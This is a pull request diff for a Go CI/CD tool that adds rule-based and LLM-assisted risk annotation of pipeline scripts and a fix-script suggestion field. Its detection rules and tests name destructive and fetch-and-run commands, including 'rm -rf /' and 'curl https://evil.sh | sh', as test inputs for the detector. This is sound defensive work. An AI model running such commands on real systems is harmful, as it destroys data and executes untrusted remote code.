### PR TITLE
feat(ai): 脚本风险标注 + 失败修复脚本建议(护城河)

### DIFF
--- a/internal/ai/ai.go
+++ b/internal/ai/ai.go
@@ -126,6 +126,11 @@ type Service interface {
 	// 优雅降级铁律:AI 未配 / 超时 / 不可解析 / 空 hypothesis / 低质 → status=unavailable + reason,
 	// **绝不返回 error 致上层 500**(本方法对降级路径返回 (*Diagnosis, nil),仅极少内部错回 error)。
 	Diagnose(ctx context.Context, in DiagnoseInput) (*Diagnosis, error)
+	// AnnotateRisks 对脚本步骤命令做风险标注(护城河):确定性正则预扫 + 可选 LLM 语义增强。
+	// **出网前必脱敏**:入参 Masker 登记的 secret 在脚本进 prompt / 取证据前一律 [MASKED];
+	// 检测到明文密钥的标注本身绝不回显该密钥。优雅降级铁律:AI 未配 / 失败 / 不可解析 → 仅返回
+	// 确定性规则结果 + AIEnhanced=false + 人读 reason,**永远返回 (*RiskReport, nil),绝不 500**。
+	AnnotateRisks(ctx context.Context, in AnnotateRisksInput) (*RiskReport, error)
 }
 
 // service 是 store + vault + 注入 http.Client 支撑的 Service 实现。

--- a/internal/ai/diagnose.go
+++ b/internal/ai/diagnose.go
@@ -58,14 +58,17 @@ type DiagnosisEvidence struct {
 
 // Diagnosis 是 AI 失败诊断的领域模型(对齐冻结 diagnosis 子 DTO)。
 type Diagnosis struct {
-	Status          string              `json:"status"` // ready | unavailable | pending
-	Reason          string              `json:"reason"` // status≠ready 时人读原因(绝无密钥)
-	Hypothesis      string              `json:"hypothesis"`
-	Confidence      string              `json:"confidence"` // high | medium | low
-	AlternateCauses []string            `json:"alternateCauses"`
-	FixSuggestions  []string            `json:"fixSuggestions"`
-	Evidence        []DiagnosisEvidence `json:"evidence"`
-	GeneratedAt     time.Time           `json:"generatedAt"`
+	Status          string   `json:"status"` // ready | unavailable | pending
+	Reason          string   `json:"reason"` // status≠ready 时人读原因(绝无密钥)
+	Hypothesis      string   `json:"hypothesis"`
+	Confidence      string   `json:"confidence"` // high | medium | low
+	AlternateCauses []string `json:"alternateCauses"`
+	FixSuggestions  []string `json:"fixSuggestions"`
+	// FixScript 是可直接复制粘贴的「修复脚本/补丁片段」(护城河 · AI moat),针对失败步骤给出
+	// 具体可执行的改法(如 shell 命令、配置 diff)。脱敏后落库;空串 = 模型未给出。
+	FixScript   string              `json:"fixScript"`
+	Evidence    []DiagnosisEvidence `json:"evidence"`
+	GeneratedAt time.Time           `json:"generatedAt"`
 }
 
 // unavailable 构造一个 status=unavailable 的诊断(带人读 reason;绝无密钥)。
@@ -86,6 +89,8 @@ type llmDiagnosis struct {
 	Confidence      string   `json:"confidence"`
 	AlternateCauses []string `json:"alternateCauses"`
 	FixSuggestions  []string `json:"fixSuggestions"`
+	// FixScript 是模型给的可执行修复脚本/补丁片段(护城河);脱敏后采纳,绝不回显原始 secret。
+	FixScript string `json:"fixScript"`
 	// EvidenceLines 是模型认为命中的行号(1-based);证据正文以脱敏日志为准,不取模型回的文本。
 	EvidenceLines []int `json:"evidenceLines"`
 }
@@ -167,6 +172,7 @@ func (s *service) Diagnose(ctx context.Context, in DiagnoseInput) (*Diagnosis, e
 		Confidence:      normalizeConfidence(parsed.Confidence),
 		AlternateCauses: sanitizeMaskList(masker, parsed.AlternateCauses),
 		FixSuggestions:  sanitizeMaskList(masker, parsed.FixSuggestions),
+		FixScript:       masker.Scrub(strings.TrimSpace(parsed.FixScript)),
 		Evidence:        evidence,
 		GeneratedAt:     time.Now().UTC(),
 	}
@@ -298,13 +304,15 @@ func buildDiagnosePrompt(maskedLines []string, step, project string) string {
   "hypothesis": "最可能的根因是 ...(假说,非结论)",
   "confidence": "high|medium|low",
   "alternateCauses": ["低置信时列出的其它可能根因"],
-  "fixSuggestions": ["可执行的修复建议"],
+  "fixSuggestions": ["可执行的修复建议(人读要点,简短)"],
+  "fixScript": "可直接复制粘贴的修复脚本/补丁片段(shell 命令或配置 diff),针对失败步骤给出具体改法;若无把握则留空字符串",
   "evidenceLines": [12, 13]
 }
 约束:
 - confidence 仅能为 high/medium/low;不确定时用 low 或 medium 并填 alternateCauses。
 - evidenceLines 为上面日志中支撑你假说的**行号**(整数数组),取最相关的少数几行。
-- 不要在任何字段回显敏感信息或凭据。
+- fixScript 是单个字符串(可含换行 \n),应是能直接执行/套用的命令或补丁;无具体可执行改法时给空字符串 ""。
+- 不要在任何字段(含 fixScript)回显敏感信息或凭据。
 `)
 	return b.String()
 }

--- a/internal/ai/diagnose_test.go
+++ b/internal/ai/diagnose_test.go
@@ -26,6 +26,7 @@ const stubDiagnosisJSON = `{
   "confidence": "high",
   "alternateCauses": ["也可能是 lockfile 未提交"],
   "fixSuggestions": ["在 package.json 声明 leftpad 并提交 lockfile"],
+  "fixScript": "npm install leftpad@^1.3.0 --save\ngit add package.json package-lock.json",
   "evidenceLines": [2]
 }`
 
@@ -87,6 +88,10 @@ func TestDiagnoseReady(t *testing.T) {
 			if len(d.FixSuggestions) == 0 {
 				t.Fatalf("fixSuggestions 应非空")
 			}
+			// 护城河:可执行修复脚本应被采纳。
+			if !strings.Contains(d.FixScript, "npm install leftpad") {
+				t.Fatalf("fixScript 应含可执行修复命令: %q", d.FixScript)
+			}
 			if len(d.Evidence) == 0 {
 				t.Fatalf("evidence 应非空")
 			}
@@ -107,6 +112,7 @@ func TestDiagnoseMasksSecret(t *testing.T) {
 	  "confidence": "low",
 	  "alternateCauses": ["可能涉及 ` + fakeRunSecret + `"],
 	  "fixSuggestions": ["移除 ` + fakeRunSecret + ` 泄漏"],
+	  "fixScript": "echo ` + fakeRunSecret + ` # 移除此行",
 	  "evidenceLines": [3]
 	}`
 	srv, cap := diagStubLLM(t, ProviderOpenAI, echoJSON)
@@ -138,6 +144,10 @@ func TestDiagnoseMasksSecret(t *testing.T) {
 		if strings.Contains(f, fakeRunSecret) {
 			t.Fatalf("fixSuggestions 泄漏明文 secret: %q", f)
 		}
+	}
+	// fixScript(护城河)亦须二次脱敏:模型回显 secret 时绝不原样输出。
+	if strings.Contains(d.FixScript, fakeRunSecret) {
+		t.Fatalf("fixScript 泄漏明文 secret: %q", d.FixScript)
 	}
 	// 3) evidence(命中行 3,正含 secret 的那行)取自脱敏日志,应为 [MASKED] 而非明文。
 	foundMasked := false

--- a/internal/ai/generate.go
+++ b/internal/ai/generate.go
@@ -128,9 +128,15 @@ func (s *service) Generate(ctx context.Context, in GenerateInput) (*Proposal, er
 	return proposal, nil
 }
 
-// chat 按 provider 构造 chat 请求并取回助手文本(经注入 http.Client)。
+// chat 按 provider 构造 chat 请求并取回助手文本(经注入 http.Client),使用默认 max_tokens。
 // 失败统一返回 ErrGenerateFailed 包裹的人读错误(不携带底层网络错误,避免 URL 密钥外泄)。
 func (s *service) chat(ctx context.Context, provider, baseURL, model, apiKey, prompt string) (string, error) {
+	return s.chatWithTokens(ctx, provider, baseURL, model, apiKey, prompt, generateMaxTokens)
+}
+
+// chatWithTokens 同 chat,但允许调用方指定 claude 的 max_tokens(openai/ollama 沿用其默认)。
+// 复用同一套 per-provider 请求构造 / 响应解析 / 错误脱敏逻辑(供风险标注等较短回包场景调小)。
+func (s *service) chatWithTokens(ctx context.Context, provider, baseURL, model, apiKey, prompt string, maxTokens int) (string, error) {
 	base := strings.TrimRight(baseURL, "/")
 
 	var (
@@ -147,7 +153,7 @@ func (s *service) chat(ctx context.Context, provider, baseURL, model, apiKey, pr
 		header["anthropic-version"] = "2023-06-01"
 		body, err = json.Marshal(map[string]any{
 			"model":      model,
-			"max_tokens": generateMaxTokens,
+			"max_tokens": maxTokens,
 			"messages": []map[string]string{
 				{"role": "user", "content": prompt},
 			},

--- a/internal/ai/risk.go
+++ b/internal/ai/risk.go
@@ -1,0 +1,485 @@
+// risk.go 是「AI 脚本风险标注」(护城河 · AI moat)。
+//
+// Service.AnnotateRisks 对一条流水线的脚本步骤(script step)命令做风险标注:
+//   - **确定性预扫(deterministic pre-pass)**:正则匹配显式高危模式(rm -rf /、
+//     curl|sh、chmod 777、未固定 latest 镜像、命令里的明文密钥/token 等),**无需 AI 即可
+//     给出价值**——这是优雅降级的下限(AI 未配/失败时仍有确定性结论)。
+//   - **LLM 增强扫(可选)**:AI 已配且启用时,再让模型补充语义级风险(如「部署前缺健康
+//     检查」「危险 sudo」等正则难枚举的项);AI 不可用 / 失败 / 不可解析时**静默跳过**,
+//     仅返回确定性结论,绝不 500 / panic。
+//
+// 安全铁律(AC-SEC):
+//   - 入参命令在出网进 prompt 前一律过 mask.Masker 脱敏;模型回的任意字段二次脱敏。
+//   - **检测到明文密钥时,标注本身绝不回显该密钥**——只标「第 N 行疑似明文密钥」,把命中片段
+//     替换为掩码占位,杜绝「为了报告泄漏而二次泄漏」。
+//   - apiKey 仅进程内解密取用、用完即弃,绝不进 prompt / 日志 / 错误 / 结果。
+//
+// 优雅降级:AnnotateRisks 永远返回 (*RiskReport, nil) —— 它**不**把 AI 不可用作为错误;
+// AIEnhanced 字段标识本次是否实际跑了 LLM 增强(供前端提示「配置 AI 可获更深分析」)。
+package ai
+
+import (
+	"context"
+	"encoding/json"
+	"fmt"
+	"regexp"
+	"strings"
+	"time"
+
+	"github.com/huangchengsir/pipewright/internal/mask"
+)
+
+// 风险等级枚举(对齐前端徽标配色:high=红、medium=琥珀、low=灰)。
+const (
+	// RiskHigh 表示高危(几乎肯定出问题 / 安全事故,如 rm -rf /、明文密钥)。
+	RiskHigh = "high"
+	// RiskMedium 表示中危(强烈建议修,如 curl|sh、chmod 777、latest 镜像)。
+	RiskMedium = "medium"
+	// RiskLow 表示低危 / 提示(如部署前缺健康检查、未加 set -e)。
+	RiskLow = "low"
+)
+
+// riskAnnotateMaxTokens 是风险标注 chat 的 max_tokens(够装一组结构化 finding)。
+const riskAnnotateMaxTokens = 1024
+
+// maxScriptChars 是发往 LLM 的脚本字符上限(防超大脚本吃 token / 内存)。
+const maxScriptChars = 8000
+
+// ScriptStep 是风险标注的中性入参:一条脚本步骤(与 pipeline.PipelineStep 解耦,
+// ai 包不 import pipeline)。Commands 为多行命令(顺序执行)。
+type ScriptStep struct {
+	Name     string   // 步骤名(prompt 上下文 / 标注定位;可空)
+	Image    string   // 构建镜像(如 node:20;用于 latest / 未固定标签检测;可空)
+	Commands []string // 多行命令(逐行扫描)
+}
+
+// RiskFinding 是一条风险标注。绝不含明文 secret(检测到明文密钥时命中片段已掩码)。
+type RiskFinding struct {
+	Level      string `json:"level"`      // high | medium | low
+	StepName   string `json:"stepName"`   // 命中步骤名(可空)
+	Line       int    `json:"line"`       // 命中命令在该步骤内的行号(1-based;0=步骤级/镜像级)
+	Title      string `json:"title"`      // 简短风险标题(人读)
+	Why        string `json:"why"`        // 为什么有风险(人读)
+	Suggestion string `json:"suggestion"` // 修复建议(人读)
+	Source     string `json:"source"`     // rule(确定性规则)| ai(LLM 增强)
+}
+
+// RiskReport 是风险标注结果(契约形状)。Findings 永不为 null(空切片表无风险)。
+type RiskReport struct {
+	Findings    []RiskFinding `json:"findings"`
+	AIEnhanced  bool          `json:"aiEnhanced"` // 是否实际跑了 LLM 增强(false=仅确定性规则)
+	AIReason    string        `json:"aiReason"`   // AIEnhanced=false 时的人读原因(未配 / 失败;绝无密钥)
+	GeneratedAt time.Time     `json:"generatedAt"`
+}
+
+// AnnotateRisksInput 是风险标注入参。Masker 出网前脱敏(进 prompt 的脚本一律 Scrub);
+// 为 nil 时本方法兜底构空 Masker(不 panic)。
+type AnnotateRisksInput struct {
+	Steps  []ScriptStep
+	Masker *mask.Masker
+}
+
+// ---- 确定性规则:命令行级正则 ----
+//
+// 每条规则匹配一行命令,命中即产出一条 finding(命中片段不回显明文 secret)。
+
+// dangerousRule 是单行命令的确定性规则。
+type dangerousRule struct {
+	re         *regexp.Regexp
+	level      string
+	title      string
+	why        string
+	suggestion string
+}
+
+// 命令行级危险模式(顺序即报告顺序;一行可命中多条)。
+var commandRules = []dangerousRule{
+	{
+		re:         regexp.MustCompile(`\bchmod\s+(-[a-zA-Z]*\s+)*-R\s+777\b|\bchmod\s+(-[a-zA-Z]*\s+)*777\s+-R\b`),
+		level:      RiskHigh,
+		title:      "chmod -R 777 递归全权限",
+		why:        "递归授予整棵目录任意用户全权限,放大被提权/篡改面。",
+		suggestion: "按需收紧到具体文件;避免递归 777。",
+	},
+	{
+		re:         regexp.MustCompile(`\brm\s+-[a-zA-Z]*r[a-zA-Z]*f[a-zA-Z]*\s+(/|/\s|\$\{?\w*\}?/?\s|\.\s*$|\*)`),
+		level:      RiskHigh,
+		title:      "递归强制删除根/通配路径",
+		why:        "rm -rf 指向根目录、未受控变量或通配,极易误删宿主/工作区数据,造成不可逆损失。",
+		suggestion: "删除前固定到具体子目录;对变量加 `: \"${VAR:?}\"` 兜底,避免变量为空时删到根。",
+	},
+	{
+		re:         regexp.MustCompile(`\bcurl\b[^|]*\|\s*(sudo\s+)?(sh|bash|zsh)\b`),
+		level:      RiskMedium,
+		title:      "管道执行远程脚本(curl | sh)",
+		why:        "把网络下载内容直接交给 shell 执行,无法校验完整性,供应链投毒即 RCE。",
+		suggestion: "先下载到本地、校验校验和/签名后再执行;或固定到可信制品仓库的特定版本。",
+	},
+	{
+		re:         regexp.MustCompile(`\bwget\b[^|]*\|\s*(sudo\s+)?(sh|bash|zsh)\b`),
+		level:      RiskMedium,
+		title:      "管道执行远程脚本(wget | sh)",
+		why:        "把网络下载内容直接交给 shell 执行,无法校验完整性,供应链投毒即 RCE。",
+		suggestion: "先下载到本地、校验校验和/签名后再执行;或固定到可信制品仓库的特定版本。",
+	},
+	{
+		re:         regexp.MustCompile(`\bchmod\s+(-[a-zA-Z]*\s+)*777\b`),
+		level:      RiskMedium,
+		title:      "chmod 777 全权限",
+		why:        "授予任意用户读写执行权限,违背最小权限原则,易被提权或篡改。",
+		suggestion: "按需收紧权限(如 755 / 750);仅对确需可执行的文件加 x 位。",
+	},
+}
+
+// secretAssignRules 匹配「命令里明文赋值/传入密钥」的常见形态(命中即标 high;不回显明文值)。
+// 覆盖:TOKEN=xxx / API_KEY=xxx / PASSWORD=xxx / --password xxx / -p xxx / _authToken=xxx /
+// Authorization: Bearer xxx 等。
+var secretAssignRules = []*regexp.Regexp{
+	// KEY=value 形态(等号赋值);键名含 token/secret/password/passwd/api[_-]?key/access[_-]?key/auth。
+	regexp.MustCompile(`(?i)\b([A-Z0-9_]*(?:TOKEN|SECRET|PASSWORD|PASSWD|API[_-]?KEY|ACCESS[_-]?KEY|AUTH[_-]?TOKEN|PRIVATE[_-]?KEY))\s*=\s*('[^']+'|"[^"]+"|[^\s'";|&]+)`),
+	// --password value / --token value / -p value(命令行参数)。
+	regexp.MustCompile(`(?i)(--(?:password|token|api[_-]?key|secret))[=\s]+('[^']+'|"[^"]+"|[^\s'";|&]+)`),
+	// Authorization: Bearer xxx / x-api-key: xxx。
+	regexp.MustCompile(`(?i)\b(authorization\s*:\s*bearer|x-api-key\s*:?)\s+('[^']+'|"[^"]+"|[^\s'";|&]+)`),
+	// _authToken=xxx(npmrc 风格)。
+	regexp.MustCompile(`(?i)(_authToken|_password)\s*=\s*('[^']+'|"[^"]+"|[^\s'";|&]+)`),
+}
+
+// 镜像 / 部署 / 健康检查 / sudo / set -e 相关模式。
+var (
+	dockerPullRe = regexp.MustCompile(`(?i)\bdocker\s+(pull|run)\s+(\S+)`)
+	healthHintRe = regexp.MustCompile(`(?i)\b(curl|wget|nc|health|healthz|ready|liveness|probe|rollout\s+status)\b`)
+	deployHintRe = regexp.MustCompile(`(?i)\b(kubectl\s+(apply|rollout|set)|helm\s+(install|upgrade)|docker\s+(run|compose\s+up)|systemctl\s+(restart|start))\b`)
+	sudoRule     = regexp.MustCompile(`(?i)(^|\s|&&|\|\|)\s*sudo\s+`)
+	setERe       = regexp.MustCompile(`(?i)set\s+-[a-z]*e`)
+)
+
+func (s *service) AnnotateRisks(ctx context.Context, in AnnotateRisksInput) (*RiskReport, error) {
+	masker := in.Masker
+	if masker == nil {
+		masker = mask.NewMasker()
+	}
+
+	report := &RiskReport{
+		Findings:    []RiskFinding{},
+		AIEnhanced:  false,
+		GeneratedAt: time.Now().UTC(),
+	}
+
+	// ---- 1) 确定性预扫(无需 AI;优雅降级下限)----
+	report.Findings = append(report.Findings, scanDeterministic(in.Steps)...)
+
+	// ---- 2) LLM 增强扫(可选;AI 不可用则静默跳过)----
+	cfg, sealed, err := s.load(ctx)
+	if err != nil || cfg == nil || !cfg.Configured || !cfg.Enabled {
+		report.AIReason = "AI 未配置或未启用,仅展示确定性规则结果"
+		return report, nil
+	}
+
+	provider := cfg.Provider
+	baseURL := cfg.BaseURL
+	if baseURL == "" {
+		baseURL = defaultBaseURL(provider)
+	}
+	if baseURL == "" {
+		report.AIReason = "AI 未配置或未启用,仅展示确定性规则结果"
+		return report, nil
+	}
+
+	apiKey := ""
+	if provider != ProviderOllama {
+		if len(sealed) == 0 {
+			report.AIReason = "AI 未配置或未启用,仅展示确定性规则结果"
+			return report, nil
+		}
+		plain, oerr := s.openSecret(sealed)
+		if oerr != nil {
+			report.AIReason = "AI 密钥不可用(保险库未配置),仅展示确定性规则结果"
+			return report, nil
+		}
+		apiKey = plain
+	}
+
+	// 出网前脱敏:脚本进 prompt 前一律 Scrub。
+	prompt := buildRiskPrompt(masker, in.Steps)
+
+	text, cerr := s.chatWithTokens(ctx, provider, baseURL, cfg.Model, apiKey, prompt, riskAnnotateMaxTokens)
+	apiKey = "" // 明文用完即弃
+	_ = apiKey
+	if cerr != nil {
+		report.AIReason = "AI 增强分析失败:" + humanizeDiagnoseErr(cerr)
+		return report, nil
+	}
+
+	aiFindings, perr := parseRiskFindings(text)
+	if perr != nil {
+		report.AIReason = "AI 返回内容无法解析,仅展示确定性规则结果"
+		return report, nil
+	}
+
+	// 二次脱敏铁律 + 来源标注:模型回的任意字段可能回显脚本里的 secret,出库前一律 Scrub。
+	for _, f := range aiFindings {
+		report.Findings = append(report.Findings, RiskFinding{
+			Level:      normalizeRiskLevel(f.Level),
+			StepName:   masker.Scrub(strings.TrimSpace(f.StepName)),
+			Line:       f.Line,
+			Title:      masker.Scrub(strings.TrimSpace(f.Title)),
+			Why:        masker.Scrub(strings.TrimSpace(f.Why)),
+			Suggestion: masker.Scrub(strings.TrimSpace(f.Suggestion)),
+			Source:     "ai",
+		})
+	}
+	report.AIEnhanced = true
+	return report, nil
+}
+
+// scanDeterministic 对每步每行跑确定性规则,产出 finding(source=rule)。
+// 检测到明文密钥时**绝不回显明文**——仅标注位置,不复制命中片段。
+func scanDeterministic(steps []ScriptStep) []RiskFinding {
+	out := []RiskFinding{}
+	for _, st := range steps {
+		// 步骤/镜像级:latest 或无标签镜像。
+		if f := scanImage(st); f != nil {
+			out = append(out, *f)
+		}
+
+		hasSetE := false
+		hasDeploy := false
+		hasHealth := false
+		for _, c := range st.Commands {
+			if setERe.MatchString(c) {
+				hasSetE = true
+			}
+			if deployHintRe.MatchString(c) {
+				hasDeploy = true
+			}
+			if healthHintRe.MatchString(c) {
+				hasHealth = true
+			}
+		}
+
+		for i, raw := range st.Commands {
+			line := i + 1
+			cmd := raw
+
+			// 危险命令规则。
+			for _, rule := range commandRules {
+				if rule.re.MatchString(cmd) {
+					out = append(out, RiskFinding{
+						Level:      rule.level,
+						StepName:   st.Name,
+						Line:       line,
+						Title:      rule.title,
+						Why:        rule.why,
+						Suggestion: rule.suggestion,
+						Source:     "rule",
+					})
+				}
+			}
+
+			// 明文密钥规则(只标位置,绝不回显命中片段)。
+			if matchesSecretAssign(cmd) {
+				out = append(out, RiskFinding{
+					Level:      RiskHigh,
+					StepName:   st.Name,
+					Line:       line,
+					Title:      "命令中疑似硬编码明文密钥",
+					Why:        "在脚本里明文写入 token/密码/密钥会随日志、镜像层、配置一并泄漏;凭据应走平台凭据库注入。",
+					Suggestion: "改用步骤级 secret 环境变量(凭据引用),执行时即取即注入,绝不在命令里写明文。",
+					Source:     "rule",
+				})
+			}
+
+			// 行内 latest 镜像(docker pull/run xxx:latest)。
+			if f := scanInlineLatest(cmd, st.Name, line); f != nil {
+				out = append(out, *f)
+			}
+
+			// sudo 提示(low)。
+			if sudoRule.MatchString(cmd) {
+				out = append(out, RiskFinding{
+					Level:      RiskLow,
+					StepName:   st.Name,
+					Line:       line,
+					Title:      "使用 sudo 提权",
+					Why:        "构建/部署脚本中的 sudo 扩大了执行面;隔离构建容器内通常无需 sudo。",
+					Suggestion: "确认是否真的需要 root;能用非特权用户就不用 sudo。",
+					Source:     "rule",
+				})
+			}
+		}
+
+		// 步骤级:部署动作但全程无健康检查(low)。
+		if hasDeploy && !hasHealth {
+			out = append(out, RiskFinding{
+				Level:      RiskLow,
+				StepName:   st.Name,
+				Line:       0,
+				Title:      "部署前后缺少健康检查",
+				Why:        "存在部署动作(kubectl/helm/docker/systemctl)但未见健康/就绪探测,故障可能静默发布。",
+				Suggestion: "部署后加就绪检查(如 curl /healthz、kubectl rollout status),失败即中止。",
+				Source:     "rule",
+			})
+		}
+
+		// 步骤级:多行脚本未 set -e(low),错误不中止。
+		if len(st.Commands) > 1 && !hasSetE {
+			out = append(out, RiskFinding{
+				Level:      RiskLow,
+				StepName:   st.Name,
+				Line:       0,
+				Title:      "多行脚本未启用 set -e",
+				Why:        "未加 set -e 时,中间命令失败仍会继续执行后续步骤,可能带病发布。",
+				Suggestion: "在脚本开头加 `set -euo pipefail`,任一命令失败即中止。",
+				Source:     "rule",
+			})
+		}
+	}
+	return out
+}
+
+// scanImage 检测步骤镜像是否未固定版本(:latest 或无标签)。
+func scanImage(st ScriptStep) *RiskFinding {
+	img := strings.TrimSpace(st.Image)
+	if img == "" {
+		return nil
+	}
+	tagged := strings.Contains(img, ":") && !strings.HasSuffix(img, ":")
+	usesLatest := strings.HasSuffix(strings.ToLower(img), ":latest")
+	if usesLatest || !tagged {
+		return &RiskFinding{
+			Level:      RiskMedium,
+			StepName:   st.Name,
+			Line:       0,
+			Title:      "构建镜像未固定版本",
+			Why:        "使用 latest 或无标签镜像会让构建不可复现,上游变更可能悄无声息地破坏流水线。",
+			Suggestion: "固定到具体版本标签(如 node:20.11)或 digest(@sha256:...),保证可复现。",
+			Source:     "rule",
+		}
+	}
+	return nil
+}
+
+// scanInlineLatest 检测命令里 docker pull/run 的 latest 镜像引用。
+func scanInlineLatest(cmd, stepName string, line int) *RiskFinding {
+	m := dockerPullRe.FindStringSubmatch(cmd)
+	if m == nil {
+		return nil
+	}
+	ref := m[2]
+	if strings.HasSuffix(strings.ToLower(ref), ":latest") || (!strings.Contains(ref, ":") && !strings.Contains(ref, "@")) {
+		return &RiskFinding{
+			Level:      RiskMedium,
+			StepName:   stepName,
+			Line:       line,
+			Title:      "拉取/运行未固定版本镜像",
+			Why:        "docker pull/run 使用 latest 或无标签镜像,构建/部署不可复现。",
+			Suggestion: "固定到具体版本标签或 digest。",
+			Source:     "rule",
+		}
+	}
+	return nil
+}
+
+// matchesSecretAssign 报告该行是否疑似明文写入密钥(不回显命中内容)。
+func matchesSecretAssign(cmd string) bool {
+	for _, re := range secretAssignRules {
+		if re.MatchString(cmd) {
+			return true
+		}
+	}
+	return false
+}
+
+// normalizeRiskLevel 归一风险等级(非法值兜底 low)。
+func normalizeRiskLevel(l string) string {
+	switch strings.ToLower(strings.TrimSpace(l)) {
+	case RiskHigh:
+		return RiskHigh
+	case RiskMedium:
+		return RiskMedium
+	default:
+		return RiskLow
+	}
+}
+
+// llmRiskFinding 是 LLM 期望回的单条 finding 形状。
+type llmRiskFinding struct {
+	Level      string `json:"level"`
+	StepName   string `json:"stepName"`
+	Line       int    `json:"line"`
+	Title      string `json:"title"`
+	Why        string `json:"why"`
+	Suggestion string `json:"suggestion"`
+}
+
+// llmRiskResponse 是 LLM 期望回的整体形状(剥 fence 后 Unmarshal)。
+type llmRiskResponse struct {
+	Findings []llmRiskFinding `json:"findings"`
+}
+
+// parseRiskFindings 容错剥 fence 解析 LLM 文本为 finding 列表(空标题项丢弃)。
+func parseRiskFindings(text string) ([]llmRiskFinding, error) {
+	jsonText := stripJSONFence(text)
+	if strings.TrimSpace(jsonText) == "" {
+		return nil, fmt.Errorf("%w: 模型未返回可解析内容", ErrGenerateFailed)
+	}
+	var r llmRiskResponse
+	if err := json.Unmarshal([]byte(jsonText), &r); err != nil {
+		return nil, fmt.Errorf("%w: 模型返回的不是有效 JSON", ErrGenerateFailed)
+	}
+	out := make([]llmRiskFinding, 0, len(r.Findings))
+	for _, f := range r.Findings {
+		if strings.TrimSpace(f.Title) == "" {
+			continue
+		}
+		out = append(out, f)
+	}
+	return out, nil
+}
+
+// buildRiskPrompt 构造发给 LLM 的风险标注 prompt:脱敏脚本(带步骤名 + 行号)+ 期望 JSON schema。
+// 脚本进 prompt 前一律 Scrub;绝不含 apiKey / token / 明文 secret。
+func buildRiskPrompt(m *mask.Masker, steps []ScriptStep) string {
+	var b strings.Builder
+	b.WriteString("你是 CI/CD 脚本安全审计助手。请审计下面流水线的脚本步骤命令,找出**语义级**安全/可靠性风险。\n")
+	b.WriteString("简单的正则可命中模式(rm -rf /、curl|sh、chmod 777、明文密钥、latest 镜像)已由规则引擎覆盖,请你**重点补充**:\n")
+	b.WriteString("- 部署前/后缺健康检查、缺回滚\n- 危险的环境变量/凭据使用(虽非显式明文,但可能泄漏)\n- 不可复现/不幂等的步骤、竞态、误删风险\n- 过度授权、网络出网到不可信源\n\n")
+
+	written := 0
+	for si, st := range steps {
+		stepName := m.Scrub(strings.TrimSpace(st.Name))
+		if stepName == "" {
+			stepName = fmt.Sprintf("步骤%d", si+1)
+		}
+		fmt.Fprintf(&b, "## %s(镜像:%s)\n", stepName, m.Scrub(strings.TrimSpace(st.Image)))
+		for li, c := range st.Commands {
+			scrubbed := m.Scrub(c)
+			if written+len(scrubbed) > maxScriptChars {
+				b.WriteString("…(脚本过长,已截断)\n")
+				goto done
+			}
+			fmt.Fprintf(&b, "%d: %s\n", li+1, scrubbed)
+			written += len(scrubbed)
+		}
+		b.WriteString("\n")
+	}
+done:
+
+	b.WriteString(`
+## 输出要求
+只输出一个 JSON 对象(不要任何解释文字、不要 markdown 代码块),严格符合以下结构:
+{
+  "findings": [
+    { "level": "high|medium|low", "stepName": "命中步骤名", "line": 3, "title": "简短风险标题", "why": "为什么有风险", "suggestion": "如何修复" }
+  ]
+}
+约束:
+- level 仅能为 high/medium/low。
+- line 为该步骤内命令的行号(1-based);步骤级风险用 0。
+- 不要重复规则引擎已能命中的显式模式;聚焦语义级风险。
+- 不要在任何字段回显敏感信息或凭据;若发现疑似明文密钥,只描述位置,不要复制其值。
+- 没有发现风险时 findings 为空数组。
+`)
+	return b.String()
+}

--- a/internal/ai/risk_test.go
+++ b/internal/ai/risk_test.go
@@ -1,0 +1,226 @@
+package ai
+
+import (
+	"net/http"
+	"strings"
+	"testing"
+
+	"github.com/huangchengsir/pipewright/internal/mask"
+)
+
+// fakeScriptSecret 是测试用的「假 secret」,模拟脚本里内嵌的明文凭据。
+const fakeScriptSecret = "ghp_RISKLEAK_abc123XYZ"
+
+// findingWithTitle 在报告中找含指定标题子串的 finding(便于断言)。
+func findingWithTitle(report *RiskReport, sub string) *RiskFinding {
+	for i := range report.Findings {
+		if strings.Contains(report.Findings[i].Title, sub) {
+			return &report.Findings[i]
+		}
+	}
+	return nil
+}
+
+func maskerForScript() *mask.Masker {
+	m := mask.NewMasker()
+	m.RegisterSecret(fakeScriptSecret)
+	return m
+}
+
+// TestAnnotateRisksDeterministicNoAI 验证 AI 未配时仍跑确定性规则,且永不 error。
+func TestAnnotateRisksDeterministicNoAI(t *testing.T) {
+	svc, _, _ := newService(t, http.DefaultClient) // 从未 Save 配置 → AI 不可用
+
+	report, err := svc.AnnotateRisks(ctx(), AnnotateRisksInput{
+		Steps: []ScriptStep{
+			{
+				Name:  "构建",
+				Image: "node:latest",
+				Commands: []string{
+					"rm -rf /",
+					"curl https://evil.sh | sh",
+					"chmod 777 ./app",
+				},
+			},
+		},
+		Masker: maskerForScript(),
+	})
+	if err != nil {
+		t.Fatalf("AnnotateRisks 不应返回 error,得 %v", err)
+	}
+	if report.AIEnhanced {
+		t.Fatalf("AI 未配置不应 AIEnhanced=true")
+	}
+	if report.AIReason == "" {
+		t.Fatalf("AI 未配置应给人读 reason")
+	}
+
+	// 确定性命中:rm -rf / (high)、curl|sh (medium)、chmod 777 (medium)、latest 镜像 (medium)。
+	if f := findingWithTitle(report, "递归强制删除"); f == nil || f.Level != RiskHigh {
+		t.Fatalf("应命中 rm -rf / high: %+v", report.Findings)
+	}
+	if f := findingWithTitle(report, "curl | sh"); f == nil || f.Level != RiskMedium {
+		t.Fatalf("应命中 curl|sh medium")
+	}
+	if f := findingWithTitle(report, "chmod 777"); f == nil {
+		t.Fatalf("应命中 chmod 777")
+	}
+	if f := findingWithTitle(report, "镜像未固定版本"); f == nil {
+		t.Fatalf("应命中 latest 镜像未固定版本")
+	}
+	// 所有确定性 finding 来源应为 rule。
+	for _, f := range report.Findings {
+		if f.Source != "rule" {
+			t.Fatalf("AI 未配时所有 finding 来源应为 rule: %+v", f)
+		}
+	}
+}
+
+// TestAnnotateRisksPlaintextSecretNotEchoed 验证检测到明文密钥时,标注本身绝不回显该密钥。
+func TestAnnotateRisksPlaintextSecretNotEchoed(t *testing.T) {
+	svc, _, _ := newService(t, http.DefaultClient)
+
+	report, err := svc.AnnotateRisks(ctx(), AnnotateRisksInput{
+		Steps: []ScriptStep{
+			{
+				Name:     "发布",
+				Image:    "alpine:3.19",
+				Commands: []string{"npm config set //registry.npmjs.org/:_authToken=" + fakeScriptSecret},
+			},
+		},
+		Masker: maskerForScript(),
+	})
+	if err != nil {
+		t.Fatalf("AnnotateRisks: %v", err)
+	}
